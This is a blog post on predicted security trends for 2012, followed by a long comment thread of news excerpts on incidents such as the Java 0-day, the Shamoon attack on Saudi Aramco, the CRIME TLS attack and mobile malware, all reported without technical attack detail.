Here is my collection of security trends for 2012 from different sources:
Windows XP will be the biggest security threat in 2012 according to Sean Sullivan, security advisor at F-Secure: “People seem to be adding new systems without necessarily abandoning their old XP machines, which is great news for online criminals, as XP continues to be their favourite target.”
F-Secure also says also that it might not be long before the cyber criminals turn their attentions to tablet devices. Attacks against mobile devices have become more common and I expect this to continue this year as well.
Americans more susceptible to online scams than believed, study finds. A recent survey from The Ponemon Institute and PC Tools dives into this question and reveals a real gap between how aware Americans think they are of scams and how likely they actually are to fall for them.
Fake antivirus scams that have plagued Windows and Mac OSX during the last couple of years and now it seems that such fake antivirus scams have spread to Android. Nearly all new mobile malware in Q3 2011 was targeted at Android.. When antivirus software becomes a universally accepted requirement (the way it is on Windows is the day), has the platform has failed and missed the whole point of being mobile operating system?
Cyber criminals are developing more sophisticated attacks and the police will counterattack.
Mobile phone surveillance will increase and more details of it will surface. Last year’s findings have included Location data collecting smart-phones, Carrier IQ phone spying busted and Police Surveillance system to monitor mobile phones. In USA the Patriot Act lets them investigate anything, anywhere, without a warrant. Now they are on your devices and can monitor everything. Leaked Memo Says Apple Provides Backdoor To Governments: “in exchange for the Indian market presence” mobile device manufacturers, including RIM, Nokia, and Apple (collectively defined in the document as “RINOA”) have agreed to provide backdoor access on their devices.
Geo-location tagging in smartphones to potentially cause major security risks article says that geo-location tagging security issues are likely to be a major issue in 2012—and that many users of smartphones are unaware of the potentially serious security consequences of their use of the technology. When smartphones images to the Internet (to portals such Facebook or Flickr) there’s a strong chance they will also upload the GPS lcoation data as well. This information could be subsequently misused by third parties.
You need to find your balance between freedom and security (
Vapauden ja turvallisuuden tasapaino). Usernames poured out for all to see, passwords and personal identification numbers are published. A knowledge of access management is even more important: who has the right to know when and where the role of functioning? Access, identity and role management are essential for the protection of the whole system. Implementation of such systems is still far from complete.
When designing networked services, the development of safety should taken into account in the planning stage, rather than at the end of execution. Even a secure network and information system can not act as operating a vacuum.
Reliability of the server certificates will face more and more problems. We can see more certificate authority bankruptcies due cyber attacks to them. Certificate attacks that have focused on the PC Web browsers, are now proven to be effective against mobile browsers.
Stonesoft says that advanced evasion techniques (AET) will be a major threat. Stonesoft discovered that with certain evasion techniques (particularly when combined in particular combinations) they could sneak common exploits past many IDS/IPS systems (including their own, at the time last summer). Using the right tool set (including a custom TCP/IP stack) attackers could sneak past our best defenses. This is real and they foresee a not too distant future where things like botnet kits will have this as a checkbox feature.
Rise of Printer Malware is real. Printer malware: print a malicious document, expose your whole LAN says that sending a document to a printer that contained a malicious version of the OS can send your sensitive document anywhere in Internet. Researchers at Columbia University have discovered a new class of security flaws that could allow hackers to remotely control printers over the Internet. Potential scenario: send a resume to HR, wait for them to print it, take over the network and pwn the company. HP does have firmware update software for their printers and HP Refutes Inaccurate Claims; Clarifies on Printer Security. I wonder how many more years until that old chain letter, where some new insidious virus infects everything from your graphics card to your monitor cable, becomes true.
Unauthorized changes in the BIOS could allow or be part of a sophisticated, targeted attack on an organization, allowing an attacker to infiltrate an organization’s systems or disrupt their operations. How Do You Protect PCs from BIOS Attacks? The U.S. National Institute of Standards and Technology (NIST) has drafted a new computer-security publication that provides guidance for computer manufacturers, suppliers, and security professionals who must protect personal computers as they start up “out of the box”: “BIOS Integrity Measurement Guidelines,” NIST Special Publication 800-155.
According to Stonesoft security problems threaten the lives and the year 2012 may be the first time when we lose lives because of security offenses. According to the company does this happen remains to be seen, but the risk is due to industrial SCADA systems attacks against targets such as hospitals or automated drug delivery systems. I already posted around month ago about SCADA systems security issues.
849 Comments
Tomi says:
Finnish Communications Regulatory Authority Cert-Fi-site calls for removal of Java software from browsers.
Today’s release of Java 7 has a serious security hole, with no correction. This is a very serious risk, because cyber criminals to spread via a vulnerability in a variety of malware and Trojans.
Experts Cert-Fi’s and data security company F-Secure, right down to advise to remove Java completely.
One option is to use two browsers, one of which removes the Java-use and use it for general navigation. Java-equipped browser can be used as a reliable website where it is necessary. For example, some online banks use Java.
Source: http://www.iltalehti.fi/digi/2012082816011191_du.shtml
Tomi Engdahl says:
Air Force Openly Seeking Cyberweapons
http://it.slashdot.org/story/12/08/28/2059216/air-force-openly-seeking-cyberweapons
“The Air Force Life Cycle Management Center posted a broad agency announcement (PDF) recently, calling on contractors to submit concept papers detailing technological demonstrations of ‘cyberspace warfare operations’ capabilities”
Tomi Engdahl says:
‘Degrade, Disrupt, Deceive’: U.S. Talks Openly About Hacking Foes
http://www.wired.com/dangerroom/2012/08/degrade-disrupt-deceive/
There was a time, not all that long ago, when the U.S. military wouldn’t even whisper about its plans to hack into opponents’ networks. Now America’s armed forces can’t stop talking about it.
The latest example comes from the U.S. Air Force, which last week announced its interest in methods “to destroy, deny, degrade, disrupt, deceive, corrupt, or usurp the adversaries [sic] ability to use the cyberspace domain for his advantage.” But that’s only one item in a long list of “Cyberspace Warfare Operations Capabilities” that the Air Force would like to possess. The service, in its request for proposals, also asked for the “ability to control cyberspace effects at specified times and places,” as well as the “denial of service on cyberspace resources, current/future operating systems, and network devices.”
The Air Force says it will spend $10 million on the effort, mostly for short programs of three to 12 months; the service wants its Trojans and worms available, ASAP.
These digital weapons could even be deployed before a battle begins. The Air Force notes that it would like to deploy “technologies/capabilities” that leave “the adversary entering conflicts in a degraded state.”
Tomi Engdahl says:
Hack on Saudi Aramco hit 30,000 workstations, oil firm admits
First hacktivist-style assault to use malware?
http://www.theregister.co.uk/2012/08/29/saudi_aramco_malware_attack_analysis/
Saudi Aramco said that it had put its network back online on Saturday, 10 days after a malware attack floored 30,000 workstations at the oil giant.
In a statement, Saudi Arabia’s national oil firm said that it had “restored all its main internal network services” hit by a malware outbreak that struck on 15 August. The firm said its core business of oil production and exploration was not affected by the attack
Oil and production systems were run off “isolated network systems unaffected by the attack”, which the firm has pledged to investigate.
A previously unknown group called Cutting Sword of Justice claimed responsibility for the attack
The group said it hacked Aramco after compromising systems in “several countries” before implanting malware to “destroy 30,000 computers” within Aramco’s network.
Neither victim nor perpetrator named the malware that featured in the attack but security researchers implicated the Shamoon malware in the security breach
According to researchers, the malware also has the capacity to extract information from compromised before uploading it to the internet.
Core router names and admin passwords along with email address and supposed password of Saudi Aramco chief exec, Khalid A Al-Falih, were uploaded to Pastebin on Monday. The latest leak may be a result of the threatened follow-up attack, due to take place last weekend, rather than the fruits of the original malware-fuelled assault.
“In the past, hacktivists have typically used application or distributed denial of service (DDoS) attacks -”
“Hacktivists rarely use malware, if other hacktivists jump on this trend it could become very dangerous,”
Tomi Engdahl says:
How I cracked my neighbor’s WiFi password without breaking a sweat
http://arstechnica.com/security/2012/08/wireless-password-easily-cracked/
Readily available tools make cracking easier.
Last week’s feature explaining why passwords are under assault like never before touched a nerve with many Ars readers, and with good reason. After all, passwords are the keys that secure Web-based bank accounts, sensitive e-mail services, and virtually every other facet of our online life. Lose control of the wrong password and it may only be a matter of time until the rest of our digital assets fall, too.
Take, for example, the hundreds of millions of WiFi networks in use all over the world. If they’re like the ones within range of my office, most of them are protected by the WiFi Protected Access or WiFi Protected Access 2 security protocols. In theory, these protections prevent hackers and other unauthorized people from accessing wireless networks or even viewing traffic sent over them, but only when end users choose strong passwords.
WPA and WPA2 passwords require a minimum of eight characters
That’s not to say wireless password cracks can’t be accomplished with ease, as I learned firsthand.
Such brute-force attacks are possible, but in the best of worlds they require at least six days to exhaust all the possibilities when using Amazon’s EC2 cloud computing service. WPA’s use of a highly iterated implementation of the PBKDF2 function makes such cracks even harder.
Yes, the gains made by crackers over the past decade mean that passwords are under assault like never before.
When done right, it’s not hard to pick a passcode that will take weeks, months, or years to crack.
With odds like that, crackers are likely to move onto easier targets, say one that relies on the quickly guessed “secretpassword” or a well-known Shakespearean quote for its security.
Tomi Engdahl says:
Toyota says it was hacked by ex-IT contractor, sensitive information stolen
http://nakedsecurity.sophos.com/2012/08/29/toyota-says-it-was-hacked-by-ex-it-contractor-sensitive-information-stolen/
Toyota has accused an IT contractor that the car manufacturer fired just last week of breaking into its computer systems, and stealing sensitive information including trade secrets.
Within hours of his dismissal, Shahulhameed is said to have logged into the toyotasupplier.com website without authorisation, and spent hours downloading proprietary plans for parts, designs and pricing information.
What isn’t clear, at this time, is whether Toyota are claiming that Shahulhameed accessed their computer systems by exploiting a vulnerability or whether they had simply not reset staff passwords that he may have had access to in his position as an IT contractor with the firm.
The details in the Toyota case are currently unclear. But regardless of that, it’s a timely reminder to all businesses to remember the importance of reviewing who has access to your systems, and to underline that changing passwords and resetting access rights is essential when a member of staff leaves the company.
Tomi Engdahl says:
Big Brother on a budget: How Internet surveillance got so cheap
http://arstechnica.com/information-technology/2012/08/big-brother-meets-big-data-the-next-wave-in-net-surveillance-tech/
Deep packet inspection, petabyte-scale analytics create a “CCTV for networks.”
The tech is already helping organizations fight the ever-rising threat of hacker attacks and malware. The organizers of the London Olympic games, in an effort to prevent hackers and terrorists from using the games’ information technology for their own ends, undertook one of the most sweeping cyber-surveillance efforts ever conducted privately. In addition to the thousands of surveillance cameras that cover London, there was a massive computer security effort in the Games’ Security Operation Centers, with systems monitoring everything from network infrastructure down to point-of-sale systems and electronic door locks.
The logs from those systems generated petabytes of data before the torch was extinguished. They were processed in real-time by a security information and event management (SIEM) system using “big data” analytics to look for patterns that might indicate a threat—and triggering alarms swiftly when such a threat was found.
The combination of the sophisticated analytics and massive data storage in big data systems with DPI network security technology has created what Dr. Elan Amir, CEO of Bivio Networks, calls “a security camera for your network.”
“There’s no question that within the next three to five years, not having a copy of your network data will be as strange as not having a firewall,” Amir told me.
Tomi Engdahl says:
Every mobile phone a unique 15-digit IMEI number has played an important role in the criminal investigation.
Counterfeit mobile codes have started to make a mess of a criminal investigation. Criminals have come to forge imei codes in Finland, told MTV3 on Wednesday.
At least in part of Nokia’s and Samsung’s old basic phones imei code has been able to change the PC application. Instructions for this are published on the internet.
MTV3′s knowledge, exchanged imei codes would have already led to the fact that the full bystanders had to suspects in criminal investigations.
DNA’s production director Antti Jokinen says that Asia has made pirated phones with the same IMEI codes. Jokinen estimated that in some countries it may be thousands of phones with the same codes.
Operators assert, however, that the problem is in Finland, “marginal”.
Source: http://www.3t.fi/artikkeli/uutiset/teknologia/vaarennetyt_kannykkakoodit_sotkevat_rikostutkintaa
Tomi Engdahl says:
Oracle rushes out patch for critical 0-day Java exploit
‘Everything’s fine now, please don’t delete us’
http://www.theregister.co.uk/2012/08/30/oracle_issues_java_0day_patch/
In an uncommon break with its thrice-annual security update schedule, Oracle has released a patch for three Java 7 security flaws that have recently been targeted by web-based exploits.
“Due to the high severity of these vulnerabilities, Oracle recommends that customers apply this Security Alert as soon as possible,” Eric Maurice, the company’s director of software security assurance, said in a blog post published on Thursday.
Maurice said that the vulnerabilities patched only affect Java running in browsers, and not standalone desktop Java applications or Java running on servers.
According to Maurice, Java users who run Windows can use the Java Automatic Update feature to get the latest, patched version, which is officially dubbed Java SE 7 Update 7.
Tomi Engdahl says:
Twitter replaces smuggled video as terrorists’ preferred way to communicate
http://www.kansascity.com/2012/08/30/3786934/twitter-replaces-smuggled-video.html
For years, Islamist extremists have struggled to outsmart the censors in online forums – with their videos yanked from YouTube, their pages flagged on Facebook and their message boards hacked – but Twitter still offers a rare unfiltered space for the groups, according to analysts who monitor militants’ online presence.
“On Twitter, they get more reach to expand their propaganda. They can reach the ‘swing people,’ and try to attract more sympathizers,”
“The Taliban was in a Twitter fight with the ISAF’s Twitter account on a number of occasions,”
“There’s not a lot to be gained from taking it down,” McCants said. “The fear is: ‘Oh my God, they’re on Twitter, how far could their propaganda reach?’ Once you calm down, you see that the only people who get excited about it are geeky intel analysts and fans they already have.”
Tomi Engdahl says:
US congress wants a word with ZTE, Huawei
Considers laws to deal with national security threat posed by Chinese kit
http://www.theregister.co.uk/2012/09/03/huaweu_zte_in_us_spotlight/
China’s dominant telco vendors ZTE Corp and Huawei will take part in US congressional hearings next month regarding investigations of alleged Chinese spy threats to US telecommunications infrastructure.
investigating allegations of close ties between the Chinese government and both Huawei and ZTE
Australian and New Zealand government officials have also been part of the panel’s investigations looking into how the vendors operate in foreign markets, according to Rogers.
Earlier this year in Australia, Huawei was excluded from bidding for any National Broadband Network contracts due to concerns over national security issues.
Tomi Engdahl says:
Calculating the Cost of Full Disk Encryption
http://it.slashdot.org/story/12/09/03/0321205/calculating-the-cost-of-full-disk-encryption
‘After doing all of the math, Ponemon found that the cost of FDE on laptop and desktop computers in the U.S. per year was $235, while the cost savings from reduced data breach exposure was $4,650.’
Calculating the Cost of Full Disk Encryption
http://www.networkcomputing.com/security/calculating-the-cost-of-full-disk-encryp/240006508
Is full disk encryption (FDE) worth it? A recent study conducted by the Ponemon Institute shows that the expected benefits of FDE exceed cost by a factor ranging from four to 20, based on a reduction in the probability that data will be compromised as the result of the loss or theft of a digital device.
“Encryption is important to mitigating the damage caused by data breaches, complying with privacy and data protection regulations, and preserving brand and reputation,” states the report.
“In order to make rational decisions regarding the optimum use of encryption, it is important to comprehend the total cost of ownership (TCO). This particularly applies to solutions believed to be free but may have significantly higher TCO than commercial products.”
The study found that the most expensive element of FDE is not the hardware or software involved, but the value of user time it takes to start up, shut down and hibernate computing systems while using FDE. Also adding to the cost is the time it takes technicians to complete full disk encryption procedures.
reasons organizations choose to encrypt laptop and desktop computers in the first place
32%: self-regulatory programs
30%: ational data protection laws
25%: Minimizing exposure resulting from lost computers
23%: Avoiding harm to customers resulting from data loss
20%: Improving security posture
18%: Minimizing the cost of a data breach
17%: Complying with vendor/business partner agreements
10%: Minimizing the effect of cyberattacks
“Regardless of which approach to data protection is taken, all companies should be doing something to mitigate this risk.”
Brink adds that any type of encryption should be integrated with existing processes, including identity management and helpdesk processes, backup and recovery, patch management and end-user training.
Is full disk encryption (FDE) worth it?
The report, “The TCO for Full Disk Encryption,”
http://www.winmagic.com/ponemonstudy
Endpoint Security: Hardware Roots of Trust
http://www.aberdeen.com/Aberdeen-Library/7080/RA-trusted-computing-security.aspx
Tomi Engdahl says:
iLOQ – The Key to Security
https://www.youtube.com/watch?v=IQCyw6lUWyk
The patented award winning iLOQ locking system offers advanced security and convenient access management for master-key locking environments.
See a ILOQ C10S Lock Get Broken into in Under a Minute
https://www.youtube.com/watch?v=1KS7nbHIRcY
Finland’s ILOQ C10S is a high end lock
Recently, this lock was recently rendered ineffective, seeing as it can be broken into with nothing more than a screwdriver.
iLoq is very small company while Abloy is the “big brother”.
How To Pick Any Lock (easy)
https://www.youtube.com/watch?v=FCxT_a1kyy4&feature=fvwrel
Tomi Engdahl says:
Firefox, Opera allow crooks to hide an entire phish site in a link
Watch out for the tinyurl that isn’t
http://www.theregister.co.uk/2012/09/03/phishing_without_hosts_peril/
A shortcoming in browsers including Firefox and Opera allows crooks to easily hide an entire malicious web page in a clickable link – ideal for fooling victims into handing over passwords and other sensitive info.
the malicious web pages can be stored in data URIs – uniform resource identifiers, not to be confused with URLs – which stuff the web code into a handy string that when clicked on, instructs the browser to unpack the payload and present it as a page.
It negates the need to find somewhere to secrete your malicious page, and once shortened using a service such as TinyURL, the URI can be reduced to a small URL perfect for passing around social networks, online chats and email. Crooks would still need to set up a server to receive data from victims, however.
URI trick can sidestep traditional scam defences, such as web filtering. Data URIs may also contain a potentially malicious Java applet, a major concern following last week’s Java-related security flap, a post on Sophos’s Naked Security blog notes.
Tomi Engdahl says:
Remember importance of backups:
Three-quarters of the companies do not expect to survive the complete loss of data.
The fear is justified, because of the companies that have faced the ‘blank data loss such as fire, earthquake or other event as a result, 60 per cent had to go out of business within six months after the accident.
However, every other company has taken care to ensure the information so poorly, for example, a fire in the information is likely to disappear altogether.
“Business critical data is, however, easy to automate today’s cloud service solutions, and restore it after the loss made easy,”
Source: http://www.tietoviikko.fi/kaikki_uutiset/taydellinen+tietojen+menetys+olisi+katastrofi/a834549?s=r&wtm=tietoviikko/-04092012&
Tomi Engdahl says:
Networked Cars: Good For Safety, Bad For Privacy
Once all our cars can talk to each other, what will they reveal about us?
http://www.itworld.com/it-managementstrategy/292996/once-all-our-cars-can-talk-each-other-what-will-they-reveal-about-us
In the future, cars will be networked, personalized, and connected to the cloud. The laws protecting personal data collected from these cars? Still largely road kill.
IFA 2012 consumer electronics show in Berlin
Bottom line? In a few short years our cars will be connected and talking to each other. They will also be able to collect vast amounts of data about who we are, where we go, and what we do. Some of these things will undoubtedly make our vehicles much safer; some may erase what little roadside privacy we have left.
Using your smart phone, it will be able to connect to your data in the cloud
The question then becomes, what happens to all this data?
We’ve already seen what happens with cell phone data that’s collected by the wireless companies: Police made more than 1.3 million requests for location data last year alone, roughly two thirds of them in non-emergency situations
Tomi Engdahl says:
Cybercrime costs U.S. consumers $20.7 billion
http://news.cnet.com/8301-1009_3-57506216-83/cybercrime-costs-u.s-consumers-$20.7-billion/
U.S. consumers lost $20.7 billion to cybercrime over the past 12 months, with 71 million Americans falling victim to online bad guys, according to new research.
Globally, losses resulting from cybercrime including malware attacks and phishing hit $110 billion between July 2011 and the end of July 2012, a report by The yearly security company Symantec (.pdf) has found.
According to the report, an estimated 556 million adults across the world had first-hand experience of cybercrime over the period
The figure equates to nearly half of all adults online
Tomi Engdahl says:
SSL BEASTie boys develop follow-up ‘CRIME’ web attack
http://www.theregister.co.uk/2012/09/07/https_sesh_hijack_attack/
The security researchers who developed the infamous BEAST attack that broke SSL/TLS encryption are cooking up a new assault on the same crucial protocols.
The new attack is capable of intercepting these HTTPS connections and hijacking them.
The researchers warn that all versions of TLS/SSL – including TLS 1.2 which was resistant to their earlier BEAST (Browser Exploit Against SSL/TLS) technique – are at risk.
“By running JavaScript code in the browser of the victim and sniffing HTTPS traffic, we can decrypt session cookies,” Rizzo told Threatpost. “We don’t need to use any browser plugin and we use JavaScript to make the attack faster, but in theory we could do it with static HTML.”
Chrome and Firefox are both vulnerable to CRIME, but developers at Google and Mozilla have been given a heads up on the problem and are likely to have patches available within a few weeks.
uk marriage visa test says:
Thanks!! This was really helpfull, i’m going to give it a try in addition to my private initial wp weblog web site.
Tomi Engdahl says:
It’s Easy To Steal Identities (Of Corporations)
http://yro.slashdot.org/story/12/09/09/0536252/its-easy-to-steal-identities-of-corporations
“Two lawyers in Houston were able to exploit business filing systems to seize control of dormant publicly traded corporations”
“In many states, anyone can change important information about a publicly registered company — including the corporate officers or company contact information — without any confirmation that they have anything to do with the company in the first place.”
Despite warnings, most states slow to confront corporate ID theft
http://www.itworld.com/it-managementstrategy/293399/despite-warnings-most-states-slow-confront-corporate-id-theft
Corporations are people, and lax business filing systems mean that stealing their identities has never been easier. Now some states are starting to take action.
By manipulating business registration systems in Florida and Delaware as well as filing systems at organizations like NASDAQ and the SEC, the scammers took control of the companies and then obtained legitimate CUSIP numbers and stock trading symbols that were then used to push the worthless stock on unsuspecting investors. In all, the scheme raked in close to $100 million through bogus stock sales of 54 separate firms to gullible investors, mostly in the UK, before regulators and law enforcement got wise to it.
Tomi Engdahl says:
Exclusive: Insiders suspected in Saudi cyber attack
http://www.reuters.com/article/2012/09/07/net-us-saudi-aramco-hack-idUSBRE8860CR20120907
(Reuters) – One or more insiders with high-level access are suspected of assisting the hackers who damaged some 30,000 computers at Saudi Arabia’s national oil company last month, sources familiar with the company’s investigation say.
Tomi Engdahl says:
Five Tips to Avoid Malware in Mobile Apps
http://www.pcworld.com/businesscenter/article/243782/five_tips_to_avoid_malware_in_mobile_apps.html
Smartphones and tablets are evolving from niche luxury devices to mainstream consumer gadgets. As mobile devices become a ubiquitous part of the mainstream culture, malware developers are paying attention and are anxious to exploit the fertile new territory.
Android is the low-hanging fruit because it combines the leading smartphone platform with an open ecosystem, and the ability to purchase apps from diverse, rogue app repositories. Other platforms seem inherently more secure, but are still not invulnerable.
here are five things you should keep in mind when buying or downloading apps for your mobile devices:
Be Aware
Do Your Homework
Check Your Sources
Watch the Permissions
Use Antimalware
Tomi Engdahl says:
White House circulating draft of executive order on cybersecurity
http://thehill.com/blogs/hillicon-valley/technology/248079-white-house-circulating-draft-of-executive-order-on-cybersecurity
The White House is circulating a draft of an executive order aimed at protecting the country from cyberattacks, The Hill has learned.
The draft executive order would establish a voluntary program where companies operating critical infrastructure would elect to meet cybersecurity best practices and standards crafted, in part, by the government, according to two people familiar with the document.
It’s also unclear whether the final product will get the president’s approval to move forward.
White House counterterrorism adviser John Brennan first floated the idea of an executive order in a speech a few days after the Senate bill failed. He said the White House would consider taking action on the executive level to ensure key infrastructure such as the power grid, water supply and transportation networks are secure.
DHS would be responsible for the overall management of the program, but the Commerce Department’s National Institute of Standards and Technology (NIST) would work with industry to help craft the framework for it. The agency would work with the private sector to develop cybersecurity guidelines and best practices.
Tomi Engdahl says:
Majority of Mobile Malware Now Reliant On Toll Fraud
http://yro.slashdot.org/story/12/09/10/0449239/majority-of-mobile-malware-now-reliant-on-toll-fraud
“Spyware is no longer the primary concern with unwanted software on mobile devices. According to mobile security firm Lookout, most mobile malware performs ‘toll fraud’ — billing victims using premium SMS services.”
Tomi Engdahl says:
Microsoft: As of October, 1024-Bit Certs Are the New Minimum
http://it.slashdot.org/story/12/09/09/2324259/microsoft-as-of-october-1024-bit-certs-are-the-new-minimum
“That warning comes as Microsoft prepares to release an automatic security update for Windows on Oct. 9, 2012, that will make longer key lengths mandatory for all digital certificates that touch Windows systems. … Internet Explorer won’t be able to access any website secured using an RSA digital certificate with a key length of less than 1,024 bits.”
Tomi Engdahl says:
EXCLUSIVE: The real source of Apple device IDs leaked by Anonymous last week
http://redtape.nbcnews.com/_news/2012/09/10/13781440-exclusive-the-real-source-of-apple-device-ids-leaked-by-anonymous-last-week
A small Florida publishing company says the million-record database of Apple gadget identifiers released last week by the hacker group Anonymous was stolen from its servers two weeks ago.
Anonymous’ accusations garnered attention because they suggested that the FBI was using the unique gadget identifiers — called UDIDs — to engage in high-level spying on American citizens via their iPhones, iPads, and iPod Touch devices. The FBI denied the claim
Both Apple and the FBI were quick to deny that they were conspiring to use UDIDs to track U.S. citizens; the FBI said it never had the data, and Apple said in a statement it had never given the data to the FBI.
Paul DeHart, CEO of the Blue Toad publishing company,
It provides private-label digital edition and app-building services to 6,000 different publishers, and serves 100 million page views each month
“That’s 100 percent confidence level, it’s our data,” DeHart said.
“We’re pretty apologetic to the people who relied on us to keep this information secure.”
There is debate about how dangerous the release of the UDID data is without the other information. DeHart said he knew of no practical malicious use for the leaked data.
“Honestly, the UDID information by itself isn’t harmful, as far as we know,”
Users who are concerned their UDID might be in the leaked list really don’t have any good options for dealing with the issue
“There’s nothing you can do. The UDID is permanently burned into the device,”
tomi says:
Careful Who You Friend: Taliban Posing as ‘Attractive Women’ Online
http://www.wired.com/dangerroom/2012/09/taliban-facebook/
Tech-savvy Talibs have posed as pretty girls on Facebook to lure Australian troops into giving away military secrets. That’s one disturbing — but not totally surprising — conclusion of a recent Aussie government review of military social media usage.
After all, this sort of thing has happened before.
Tomi Engdahl says:
Anonymous: behind the masks of the cyber insurgents
http://www.guardian.co.uk/technology/2012/sep/08/anonymous-behind-masks-cyber-insurgents
Since 2008, the internet collective have hacked the CIA, the Sun newspaper, the Church of Scientology and a host of other large corporations, sparking a global police crackdown last year. But who and what are Anonymous? A radical new form of activism – or just bored teenagers?
Tomi Engdahl says:
Verizon launches Mobile Security app for Android as antivirus companies target carriers
http://www.theverge.com/2012/9/11/3314770/verizon-mobile-security-android-malware
Verizon has introduced a McAfee-based Mobile Security app for its line of Android devices, with prices ranging from free to $1.99 a month. The carrier claims that devices are targets “of the same security and privacy threats that plague laptops and desktops,” and while consumers haven’t taken to antivirus software on mobile, companies like McAfee are striking deals directly with carriers.
Android represents a new market for antivirus companies due to Google’s slow implementation of features such as device location and remote wiping — functionality that is sorely lacking from stock Android, but present for iPhone and iPad users.
Tomi Engdahl says:
If the attacker wants society completely messed up, it would work for a few days of the attack against the shops.
IT researcher Professor Hannu H. Kari points out that society’s need for mixing or electricity to paralyze the nuclear power plant being intercepted. The mere network traffic is enough.
- In the real world, and cyber-world are strongly attached to each other. We assume that information flows quickly. Interruption of the flow of information makes everyday life very difficult.
For example, Kari mentions trades far-reaching logistics chains. Stocks are small, and logistics is based on orders. So for data transfers. If it becomes unstable, there is trouble.
Pulling off the wires will not help to solve the network attack.
If you limit the communication links with the outside it turns out to ordinary citizens. Defense can serve as the aggressor.
The fact that many society’s vital functions operate in closed systems improves the security.
Source: http://www.iltasanomat.fi/digi/art-1288498799235.html?pos=ok-nln
Tomi Engdahl says:
Analysts: Shamoon oil biz malware flingers were ‘amateurs’
Programming errors ahoy….
http://www.theregister.co.uk/2012/09/12/shamoon_analysis/
Fresh analysis of the Shamoon malware has concluded that its authors are more likely to be “skilled amateurs” rather than elite cyber-spies.
Shamoon has been linked to recent high-profile malware outbreaks at Saudi Aramco and RasGas, Gulf-based oil and gas firms. Saudi Aramco lost its network for 10 days as a result of the attack, which affected 30,000 workstations. The outbreak was particularly nasty because Shamoon contains file-wiping functionality that can make infected machines inoperable as well as destroying data.
Dmitry Tarakanov concludes that controversial features, such as planting the image of a burning US flag and compromised PCs and (more damningly) coding errors mean that its more likely to be the work of amateurs than elite coders, such as the developers of either ZeuS or Stuxnet, for example.
Tomi Engdahl says:
Finland faced yesterday a series of cyber-attacks:
Helsingin Sanomat crashed under attack – the police to “technical fault”
Both the Helsingin Sanomat that Iltasanomat network services have been in the afternoon during the bust
Instead, the police website problems at the same time due to the police release, the “technical failure”.
Source: http://www.tietoviikko.fi/kaikki_uutiset/helsingin+sanomat+kaatui+hyokkaykseen++poliisi+quottekniseen+vikaanquot/a837509
Coincidence or not? The police, “a hardware problem is likely related attack”
“Shock was a wake-up of Finnish society and business. Cyber-threats are already in the normal threats. We need to think about how to proceed if, say, the field of administration is under attack, ”
Yesterday’s attack involves many strange features.
“Our records indicate that the attack was quite centrally in Ukraine, which is also unusual. Generally, attacks are routed through different countries much more efficiently, ”
Whole attack was a strangely amateurish.
Strong personal opinions, however, he says, that occurred yesterday, police and border guards ‘equipment failure’ do not sound credible. “I do not believe in coincidences. Oddly taking place at the same time a hardware problem is probably related to shock. ”
Stonesoft cyber security manager Jarno Limnell believes that yesterday’s cyber-attack was “knocking”, which was to test the Finnish schemes.
Source: http://www.tietoviikko.fi/kaikki_uutiset/sattumaa+vai+ei+poliisin+quotlaitteistoongelmilla+on+todennakoisesti+yhteys+iskuunquot/a837949?s=r&wtm=tietoviikko/-12092012&
Tomi Engdahl says:
Nude photos of Emma Watson: a dangerous thing to search for
http://www.wired.co.uk/news/archive/2012-09/10/emma-watson-dangerous-nude
As part of a frankly genius annual PR move, security firm McAfee has named Emma Watson the “most dangerous cyber celebrity”, based on the number of sites that serve up malware and viruses to unsuspecting web users who search for her.
According to McAfee, searching for “Emma Watson” along with “nude pictures” or “fakes” is the best way to be lured onto malware-ridden celebrity websites. The same is true for Shakira, Megan Fox and Selena Gomez.
“Due to the richness of the data and the high interaction, often times consumers forget the risks that they are taking by clicking on the links.”
McAfee annually releases this list of “dangerous” celebrities
Tomi Engdahl says:
Crack in Internet’s foundation of trust allows HTTPS session hijacking
Attack dubbed CRIME breaks crypto used to prevent snooping of sensitive data.
http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/
Researchers have identified a security weakness that allows them hijack web browser sessions even when they’re protected by the HTTPS encryption that banks and ecommerce sites use to prevent snooping on sensitive transactions.
The technique exploits web sessions protected by the Secure Sockets Layer and Transport Layer Security protocols when they use one of two data-compression schemes designed to reduce network congestion or the time it takes for webpages to load. Short for Compression Ratio Info-leak Made Easy, CRIME works only when both the browser and server support TLS compression or SPDY, an open networking protocol used by both Google and Twitter.
CRIME is the latest black eye for the widely used encryption protocols
Representatives from Google, Mozilla, and Microsoft said their companies’ browsers weren’t vulnerable to CRIME attacks.
smartphone browsers and a myriad of other applications that rely on TLS are believed to remain vulnerable.
Even when a browser is vulnerable, an HTTPS session can only be hijacked when one of those browsers is used to connect to a site that supports SPDY or TLS compression.
“I don’t think anyone realized that this enables an attack on HTTP over TLS, or that an attacker could learn the value of secret cookies sent over a TLS-encrypted connection,”
Tomi Engdahl says:
Over half’ of Android devices have unpatched holes
Fix is up to your carrier, Google, mobo maker – just about everyone
http://www.theregister.co.uk/2012/09/14/duo_says_android_security_nightmare/
Duo Security is claiming that “over half” of Android devices have unpatched vulnerabilities.
The company’s Jon Oberheide says in this blog post that the results come from the first slew of users of the company’s X-Ray Android vulnerability scanner.
Android patching is a pain in the neck, involving as it does the complex ecosystem of Google, device makers and carriers. The easiest way to get an up-to-date version of Android is to buy a new device.
Tomi Engdahl says:
Huawei, ZTE clash with US over national security
How big a risk can it be given US telco kit-makers do their manufacturing in China?
http://www.theregister.co.uk/2012/09/14/huawei_zte_congress_hearing/
Chinese telecoms kit makers Huawei and ZTE failed to allay the long standing national security concerns of Congressmen surrounding their access to the US market, at a high profile hearing in Washington on Thursday.
The two have been in the spotlight for almost a year as the US House of Representatives Select Committee on Intelligence investigated claims that the two are linked to the Chinese military.
“We respectfully suggest that the Committee’s focus on ZTE, to the exclusion of the Western telecom vendors, addresses the overall issue of risk so narrowly that it omits from the Committee’s inquiry the suppliers of the vast majority of equipment used in the US market,” said ZTE SVP Zhu Jinyun.
“It is strange the internal corporate documents of purportedly private sector firms are considered classified secrets in China. This fact alone gives us a reason to question their independence.”
Rightly or wrongly, the continued intelligence linking persistent cyber attacks on US organisations originating from China will likely keep US politicians from softening their stance, despite the large sums of money both firms are already ploughing into the US economy.
Tomi Engdahl says:
Blackhole 2: Crimeware kit gets stealthier, Windows 8 support
Malware-flinging tool to target mobiles too
http://www.theregister.co.uk/2012/09/13/blackhole_exploit_kit_revamp/
Cybercrooks have unveiled a new version of the Blackhole exploit kit. Version 2 of Blackhole is expressly designed to better avoid security defences. Support for Windows 8 and mobile devices is another key feature, a sign of the changing target platforms for malware-based cyberscams
